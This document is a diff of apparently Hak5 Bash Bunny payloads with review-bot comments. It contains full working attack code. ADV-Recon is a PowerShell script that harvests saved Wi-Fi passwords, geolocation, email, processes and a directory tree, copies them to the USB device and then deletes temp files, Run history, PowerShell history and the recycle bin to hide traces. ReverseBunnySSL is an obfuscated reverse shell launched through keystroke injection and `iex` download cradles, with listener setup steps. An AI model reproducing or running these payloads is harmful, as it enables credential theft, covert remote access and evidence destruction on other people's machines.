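Review bot: `QUACK DEALY 50` near the end of the key sequence misspells `DELAY`, so that line is presumably not interpreted as a pause; it should read `QUACK DELAY 50`. The first header line also repeats its label (`# Title: Title: ...`) and should be `# Title: ScreenSaveR_FuNNN_b/b`. The description says the photos are saved to the Camera Roll folder but not that they stay there after the run; a header line such as `# Side effects: leaves 15 webcam photos in the user's Camera Roll and changes the screensaver settings` would make the privacy impact explicit.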


@ -0,0 +1,33 @@
#!/bin/bash
# Title: My Pictures 2 Ascii Art
# Description: Converts Jpeg, Png & BMP's in the My Pictures to ascii art versions.
# Author: Cribbit
# Version: 1.0
# Category: General
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
LED FINISH
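Review bot: The `cd /root/udisk/payloads/$SWITCH_POSITION/` line is unquoted and its result is not checked, so if the directory is missing, `python -m SimpleHTTPServer 80` serves whatever directory the script started in to the attached host. I would write `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1`. The script also leaves state behind on the device: the `iptables -A OUTPUT ... -j DROP` rule and the background HTTP server are still in place after `LED FINISH`, and the `while ! nc -z localhost 80` loop never ends if the server fails to bind. The header should also state that the host fetches and executes the script over unauthenticated plain HTTP with `-EP Bypass`, since that is the behaviour anyone reviewing or detecting this payload needs to know.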


@ -0,0 +1,23 @@
# My Pictures 2 Ascii Art
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: General
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: Thinathayalan Ganesan & I am Jakoby
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Converts JPEG, PNG & BMP's in the My Pictures to ascii art versions.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |


@ -0,0 +1,76 @@
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing");
$AsciiChars = @( 'M', '#', '@', '%', 'X', '=', '+', '*', ';', ':', '-', '.', ' ' )
Function PS-AsciiArt
{
[CmdletBinding()]
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, [Switch] $Reverse
)
process
{
foreach($item in $Path)
{
if ($Reverse -eq $true)
{
[array]::Reverse($AsciiChars)
}
$sb = [System.Text.StringBuilder]::new()
# Convert path to BitMap
$name = (Get-Item $Item).fullname;
$Bitmap = [System.Drawing.Bitmap]::FromFile($name)
# Resize Image
$Bitmap = (Get-ReSizedImage $BitMap 100)
# draw every other line
$draw = $true;
# loop down the image
foreach($y in (0..($BitMap.Height-1)))
{
if ($draw)
{
foreach($x in (0..($BitMap.Width-1)))
{
# get pixal
$Pixel = $Bitmap.GetPixel($X,$Y)
$Grey = ($Pixel.R + $Pixel.G + $Pixel.B) / 3;
$grayColor = [System.Drawing.Color]::FromArgb($Grey,$Grey,$Grey);
if (!$toggle)
{
$index = (($grayColor.R * ($AsciiChars.count-1)) / 255);
[void]$sb.Append($AsciiChars[$index]);
}
}
[void]$sb.AppendLine('') #Start the next row
}
# flip bool
$draw = !$draw;
}
$sb.ToString() | Out-File ([io.path]::ChangeExtension($name, "ascii.txt"))
}
}
}
Function Get-ReSizedImage
{
param(
[System.Drawing.Bitmap] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Image, [int] [parameter(mandatory=$true)] $Width
)
Process
{
$asciiHeight=0;
#Calculate the new Height of the image from its width
$asciiHeight = [int][Math]::Ceiling([double]$Image.Height * $Width / $Image.Width);
#Create a new Bitmap and define its resolution
$result = New-Object System.Drawing.Bitmap($Width, $asciiHeight);
$g = [System.Drawing.Graphics]::FromImage([System.Drawing.Image]$result);
#The interpolation mode produces high quality images
$g.InterpolationMode = [System.Drawing.Drawing2D.InterpolationMode]::HighQualityBicubic;
$g.DrawImage($Image, 0, 0, $Width, $asciiHeight);
$g.Dispose();
return $result;
}
}
Get-ChildItem ([environment]::getfolderpath("MyPictures")) | ? {$_.extension -in ".jpg", ".jpeg", ".png", ".bmp"} |% {$_.FullName | PS-AsciiArt}
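Review bot: In `PS-AsciiArt` the bitmap returned by `[System.Drawing.Bitmap]::FromFile($name)` is overwritten by the resized copy and neither object is disposed, so every picture in the user's folder stays open (and, with GDI+, likely locked) until the PowerShell process exits. Keep the source in its own variable and release both: `$src = [System.Drawing.Bitmap]::FromFile($name)`, then `$Bitmap = Get-ReSizedImage $src 100; $src.Dispose()`, and `$Bitmap.Dispose()` after the `Out-File`. `$toggle` in `if (!$toggle)` is never assigned anywhere in this file, so the test is always true and can be removed. `[io.path]::ChangeExtension($name, "ascii.txt")` maps `a.jpg` and `a.png` to the same output name, so one result silently overwrites the other. The function also has no comment-based help saying that it writes new files next to the originals.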


@ -0,0 +1,411 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data
.DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
All of the gather information is formatted neatly and output to a file
That file is then exfiltrated to the BashBunny
#>
############################################################################################################################################################
# Creating loot folder
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\ADV-Recon\$env:computername"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
############################################################################################################################################################
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
############################################################################################################################################################
# Get nearby wifi networks
try
{
$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
}
catch
{
$NearbyWifi="No nearby wifi networks detected"
}
############################################################################################################################################################
# Get info about pc
# Get IP / Network Info
try
{
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
catch
{
$computerPubIP="Error getting Public IP"
}
$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
############################################################################################################################################################
$IsDHCPEnabled = $false
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
If($network.DHCPEnabled) {
$IsDHCPEnabled = $true
}
$MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)
}
############################################################################################################################################################
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
############################################################################################################################################################
# Get HDDs
$driveType = @{
2="Removable disk "
3="Fixed local disk "
4="Network disk "
5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
$RDP = "RDP is Enabled"
} else {
$RDP = "RDP is NOT enabled"
}
############################################################################################################################################################
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
############################################################################################################################################################
# local-user
$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
$processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
new-object PSObject -property @{
"LocalAddress" = $listenerItem.LocalAddress
"RemoteAddress" = $listenerItem.RemoteAddress
"State" = $listenerItem.State
"AppliedSetting" = $listenerItem.AppliedSetting
"OwningProcess" = $listenerItem.OwningProcess
"ProcessName" = $processItem.ProcessName
}
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table
# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
# service
$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
# installed software (get uninstaller)
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
# drivers
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
############################################################################################################################################################
# MAKE LOOT FOLDER
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt"
############################################################################################################################################################
# OUTPUTS RESULTS TO LOOT FILE
Clear-Host
Write-Host
echo "Name:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $FN >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Email:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "GeoLocation:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
echo "Nearby Wifi:" >> $env:TMP\$FileName
echo "==================================================================" >> $env:TMP\$FileName
echo $NearbyWifi >> $env:TMP\$FileName
echo "" >> $env:TMP\$FileName
$computerSystem.Name >> $env:TMP\$FileName
"==================================================================
Manufacturer: " + $computerSystem.Manufacturer >> $env:TMP\$FileName
"Model: " + $computerSystem.Model >> $env:TMP\$FileName
"Serial Number: " + $computerBIOS.SerialNumber >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
"OS:
=================================================================="+ ($computerOs |out-string) >> $env:TMP\$FileName
"CPU:
=================================================================="+ ($computerCpu| out-string) >> $env:TMP\$FileName
"RAM:
==================================================================
Capacity: " + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\$FileName
"Mainboard:
=================================================================="+ ($computerMainboard| out-string) >> $env:TMP\$FileName
"Bios:
=================================================================="+ (Get-WmiObject win32_bios| out-string) >> $env:TMP\$FileName
"Local-user:
=================================================================="+ ($luser| out-string) >> $env:TMP\$FileName
"HDDs:
=================================================================="+ ($Hdds| out-string) >> $env:TMP\$FileName
"COM & SERIAL DEVICES:
==================================================================" + ($COMDevices | Out-String) >> $env:TMP\$FileName
"Network:
==================================================================
Computers MAC address: " + $MAC >> $env:TMP\$FileName
"Computers IP address: " + $computerIP.ipaddress[0] >> $env:TMP\$FileName
"Public IP address: " + $computerPubIP >> $env:TMP\$FileName
"RDP: " + $RDP >> $env:TMP\$FileName
"" >> $env:TMP\$FileName
($Network| out-string) >> $env:TMP\$FileName
"W-Lan profiles:
=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName
"listeners / ActiveTcpConnections
=================================================================="+ ($listener| Out-String) >> $env:TMP\$FileName
"Current running process:
=================================================================="+ ($process| Out-String) >> $env:TMP\$FileName
"Services:
=================================================================="+ ($service| Out-String) >> $env:TMP\$FileName
"Installed software:
=================================================================="+ ($software| Out-String) >> $env:TMP\$FileName
"Installed drivers:
=================================================================="+ ($drivers| Out-String) >> $env:TMP\$FileName
"Installed videocards:
==================================================================" + ($videocard| Out-String) >> $env:TMP\$FileName
############################################################################################################################################################
# Recon all User Directories
tree $Env:userprofile /a /f >> $env:TMP\$FileName
############################################################################################################################################################
# Remove Variables
Remove-Variable -Name computerPubIP,
computerIP,IsDHCPEnabled,Network,Networks,
computerMAC,computerSystem,computerBIOS,computerOs,
computerCpu, computerMainboard,computerRamCapacity,
computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
process,listener,listenerItem,process,service,software,drivers,videocard,
vault -ErrorAction SilentlyContinue -Force
############################################################################################################################################################
# Exfiltrate Loot
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
############################################################################################################################################################
# Popup message to signal the payload is done
$done = New-Object -ComObject Wscript.Shell;$done.Popup("script is done",1)


@ -0,0 +1,96 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ADV-Recon
A script used to do an advanced level of Recon on the targets computer
## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The GeoLocation (latitude and longitude) of where the script was ran.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Intel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card
Along with TREE list of all files in the target computer is gathered and uploaded to your BashBunny
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Command will be entered in the RunBox to start the ADV-Recon script
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,22 @@
# Title: ADV-Recon
# Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ADV-Recon.ps1')"
QUACK ENTER
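Review bot: The `# Description:` header does not say that the script this payload launches changes the host beyond reading from it. The PowerShell listing just above on this page (presumably the `ADV-Recon.ps1` named in the `QUACK STRING` line; its start is outside this view) ends by deleting everything under `$env:TEMP`, the RunMRU key, the PSReadLine history file and the recycle bin. That is data loss on the tested machine and belongs in the header, for example `# Side effects: clears %TEMP%, RunMRU, PowerShell history and the recycle bin on the host`. Because those artefacts are removed, triage of a host where this ran has to lean on process-creation and PowerShell script-block logging, where the `powershell -NoP -NonI -W Hidden` launch would still be recorded if such logging is enabled.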

File diff suppressed because one or more lines are too long


@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!Insert the IP of your attacking machine & PORT into the payload.txt!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

Binary file not shown.


@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH
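Review bot: The `cd /root/udisk/payloads/$SWITCH_POSITION/` line is unquoted and its result is never checked, so if that directory is missing, the `python -m SimpleHTTPServer 80` a few lines later serves whatever the working directory happens to be to the attached host. `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1` stops the payload instead. Even on the normal path the server exposes every file in the payload directory, not only `RBSSL.ps1`, which the header comments should state. For defenders, the observable this hunk produces on the host is a Run-dialog `powershell -NoP -NonI -w hidden` followed by `iex (New-Object Net.WebClient).DownloadString(...)` over plain HTTP to a newly attached RNDIS adapter.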